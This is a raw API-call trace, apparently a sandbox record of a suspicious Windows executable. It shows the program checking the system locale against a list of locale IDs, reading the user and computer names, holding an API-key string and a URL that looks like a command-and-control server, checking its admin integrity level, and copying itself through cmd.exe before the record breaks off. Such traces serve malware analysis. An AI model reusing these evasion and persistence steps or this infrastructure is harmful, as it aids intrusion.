[0073.851] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0073.851] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0073.851] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0073.851] LockResource (hResData=0x525e94) returned 0x525e94 [0073.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe4fd0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0073.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe4fd0, cbMultiByte=38, lpWideCharStr=0x1fde20c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0073.851] FreeResource (hResData=0x525e94) returned 0 [0073.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0073.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe4fd4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0073.851] GetCurrentThreadId () returned 0x360 [0073.851] GetCurrentThreadId () returned 0x360 [0073.851] GetCurrentThreadId () returned 0x360 [0073.852] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f8e728, cbMultiByte=96, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0073.852] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f8e728, cbMultiByte=96, lpWideCharStr=0x1fad3ac, cchWideChar=96 | out: lpWideCharStr="1049\r\n2072\r\n2073\r\n2115\r\n1091\r\n1058\r\n1090\r\n1092\r\n1064\r\n1059\r\n1067\r\n1079\r\n1087\r\n1088\r\n1062\r\n1063\r\n") returned 96 [0073.852] GetSystemDefaultLCID () returned 0x409 [0073.852] GetUserDefaultLCID () returned 0x409 [0073.852] GetSystemDefaultLangID () returned 0x2b0409 [0073.852] GetUserDefaultLangID () returned 0x409 [0073.852] GetSystemDefaultUILanguage () returned 0x409 [0073.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.854] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.854] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1049", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2072", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2073", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2115", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1091", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1058", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1090", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1092", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1064", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1059", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1067", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1079", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1087", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1088", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1062", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1063", cchCount1=4, lpString2="1033", cchCount2=4) returned 3 [0073.857] GetCurrentThreadId () returned 0x360 [0073.857] GetCurrentThreadId () returned 0x360 [0073.857] GetCurrentThreadId () returned 0x360 [0073.857] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0073.857] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x1f45eec, nSize=0x8000 | out: lpDst="LHNIWSJ") returned 0x8 [0073.857] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x1f45eec, nSize=0x8000 | out: lpDst="CIiHmnxMn6Ps") returned 0xd [0073.857] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb2a8c, cbMultiByte=12, lpWideCharStr=0x19eb38, cchWideChar=2047 | out: lpWideCharStr="eman_api_key沞蒼\x19쐈@Ӥ") returned 12 [0073.857] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fcf4ec, cbMultiByte=26, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="http://eman.mygoodsday.org\x01") returned 26 [0073.858] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0df0, dwCreationFlags=0x4, lpThreadId=0x1fde144 | out: lpThreadId=0x1fde144*=0xb68) returned 0x204 [0073.858] SetThreadPriority (hThread=0x204, nPriority=0) returned 1 [0073.858] ResumeThread (hThread=0x204) returned 0x1 [0073.859] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0073.859] LoadStringW (in: hInstance=0x400000, uID=0xff67, lpBuffer=0x19db84, cchBufferMax=4096 | out: lpBuffer="64-bit Edition") returned 0xe [0073.859] LoadStringW (in: hInstance=0x400000, uID=0xff64, lpBuffer=0x19db80, cchBufferMax=4096 | out: lpBuffer="%s (Version %d.%d, Build %d, %5:s)") returned 0x22 [0073.859] LoadStringW (in: hInstance=0x400000, uID=0xff67, lpBuffer=0x19db84, cchBufferMax=4096 | out: lpBuffer="64-bit Edition") returned 0xe [0073.859] LoadStringW (in: hInstance=0x400000, uID=0xff64, lpBuffer=0x19db80, cchBufferMax=4096 | out: lpBuffer="%s (Version %d.%d, Build %d, %5:s)") returned 0x22 [0073.859] GetCurrentThread () returned 0xfffffffe [0073.859] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fc14 | out: TokenHandle=0x19fc14*=0x0) returned 0 [0073.859] GetLastError () returned 0x3f0 [0073.859] GetCurrentProcess () returned 0xffffffff [0073.859] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fc14 | out: TokenHandle=0x19fc14*=0x208) returned 1 [0073.859] GetTokenInformation (in: TokenHandle=0x208, TokenInformationClass=0x2, TokenInformation=0x1fab370, TokenInformationLength=0x400, ReturnLength=0x19fc10 | out: TokenInformation=0x1fab370, ReturnLength=0x19fc10) returned 1 [0073.859] CloseHandle (hObject=0x208) returned 1 [0073.859] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e7754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fc0c | out: pSid=0x19fc0c*=0x2bcc30*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0073.859] EqualSid (pSid1=0x2bcc30*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1fab3e4*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7))) returned 0 [0073.859] EqualSid (pSid1=0x2bcc30*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1fab400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0073.859] EqualSid (pSid1=0x2bcc30*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1fab40c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x72)) returned 0 [0073.859] EqualSid (pSid1=0x2bcc30*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1fab418*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0073.859] GetCurrentProcess () returned 0xffffffff [0073.859] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fc18 | out: TokenHandle=0x19fc18*=0x208) returned 1 [0073.860] GetTokenInformation (in: TokenHandle=0x208, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fc14 | out: TokenInformation=0x0, ReturnLength=0x19fc14) returned 0 [0073.860] GetLastError () returned 0x7a [0073.860] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2bb030 [0073.860] GetTokenInformation (in: TokenHandle=0x208, TokenInformationClass=0x19, TokenInformation=0x2bb030, TokenInformationLength=0x14, ReturnLength=0x19fc14 | out: TokenInformation=0x2bb030, ReturnLength=0x19fc14) returned 1 [0073.860] GetSidSubAuthorityCount (pSid=0x2bb038*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2bb039 [0073.860] GetSidSubAuthority (pSid=0x2bb038*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2bb040 [0073.860] LocalFree (hMem=0x2bb030) returned 0x0 [0073.860] CloseHandle (hObject=0x208) returned 1 [0073.860] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0073.860] GetFileType (hFile=0x3c) returned 0x2 [0073.860] GetConsoleOutputCP () returned 0x1b5 [0073.860] GetFileType (hFile=0x3c) returned 0x2 [0073.860] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Admin", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.860] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Admin", cchWideChar=5, lpMultiByteStr=0x1fb9eec, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Admin", lpUsedDefaultChar=0x0) returned 5 [0073.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0073.860] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0073.861] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1fb9fdc, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0073.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0073.861] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0073.861] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1fb9fdc, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0073.861] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0x7, lpOverlapped=0x0) returned 1 [0073.861] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="IntegrityLevel = 4 (2-low,3-user,4-admin,5-system,6-protected_system)", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0073.861] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="IntegrityLevel = 4 (2-low,3-user,4-admin,5-system,6-protected_system)", cchWideChar=69, lpMultiByteStr=0x1fec23c, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IntegrityLevel = 4 (2-low,3-user,4-admin,5-system,6-protected_system)", lpUsedDefaultChar=0x0) returned 69 [0073.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0073.861] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0073.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1fba00c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0073.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0073.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0073.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1fba00c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0073.862] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0x47, lpOverlapped=0x0) returned 1 [0073.879] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0073.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f9cf24, csidl=37, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0073.881] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f9b0, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0073.881] GetTickCount () returned 0x1d9d0 [0073.881] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb84 | out: lpPerformanceCount=0x19fb84*=12134399992) returned 1 [0073.881] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb60, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0073.881] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb60, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0073.881] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb60, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0073.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb60, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0073.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb60, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0073.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb60, cbMultiByte=1, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0073.882] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f9a4, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0073.882] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C copy /V /Y \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\"", lpProcessAttributes=0x0, 